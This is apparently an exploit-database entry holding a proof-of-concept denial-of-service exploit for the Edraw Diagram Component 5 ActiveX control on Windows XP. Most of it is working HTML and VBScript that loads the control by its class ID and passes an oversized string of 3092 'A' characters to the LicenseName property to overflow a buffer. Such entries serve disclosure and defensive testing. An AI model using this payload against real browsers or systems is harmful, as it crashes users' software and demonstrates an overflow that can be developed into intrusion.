[] NeoSense

Edraw Diagram Component 5 - ActiveX Buffer Overflow (Denial of Service) (PoC)

Author: Senator of Pirates
type: dos
platform: windows
port: 
date_added: 2012-02-04 
date_updated: 2012-02-04 
verified: 0 
codes: OSVDB-81483 
tags: 
aliases:  
screenshot_url:  
application_url: 

Author : Senator of Pirates

This exploit tested on Windows Xp SP3 EN

http://www.edrawsoft.com/download/EDBoardSetup.exe

--------------------------------------------------------------------------------------------------------

<object classid='clsid:6116A7EC-B914-4CCE-B186-66E0EE7067CF' id='target' />
<script language='vbscript'>

targetFile = "C:\Program Files\edboard\EDBoard.ocx"
prototype  = "Invoke_Unknown LicenseName As String"
memberName = "LicenseName"
progid     = "EDBoardLib.EDBoard"
argCount   = 1

arg1=String(3092, "A")

target.LicenseName = arg1

</script>